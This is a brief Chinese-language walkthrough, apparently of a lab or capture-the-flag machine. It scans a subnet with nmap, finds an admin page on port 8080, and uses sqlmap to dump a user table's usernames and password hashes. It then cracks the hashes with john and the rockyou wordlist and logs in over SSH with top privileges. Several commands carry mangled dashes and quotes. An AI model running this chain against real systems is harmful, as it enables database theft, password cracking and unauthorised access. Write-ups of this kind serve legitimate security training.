nmap的几个基本扫描
sudo nmap -sn 10.10.10.0/24
访问80端口浏览下
浏览8080端口发现后台管理界面
sqlmap -r “./bp” –dbs
sqlmap -r “./bp” -D website –tables
sqlmap -r “./bp” -D website -T user –columns
sqlmap -r “./bp” -D website -T users -C username,password –dump
复制保存下来,准备用john破解
构造john可以识别的格式
cat user_pass_hash.txt|awk -F ‘|’ ‘{ print $2 “:” $3 }’|awk ‘{ gsub(” “, “”, $0); print }’
可以先用hash-identifier识别下是什么类型的hash
字符串构造:cat user_pass_hash.txt |awk -F ‘|’ ‘{print $2″:”$3}’ | awk ‘gsub(” “,””)’| awk -F”[@:]” ‘{print $1″:”$3}’
sudo john –format=raw-md5 ./hash.txt –wordlist=/usr/share/wordlists/rockyou.txt
ssh登录拿到最高权限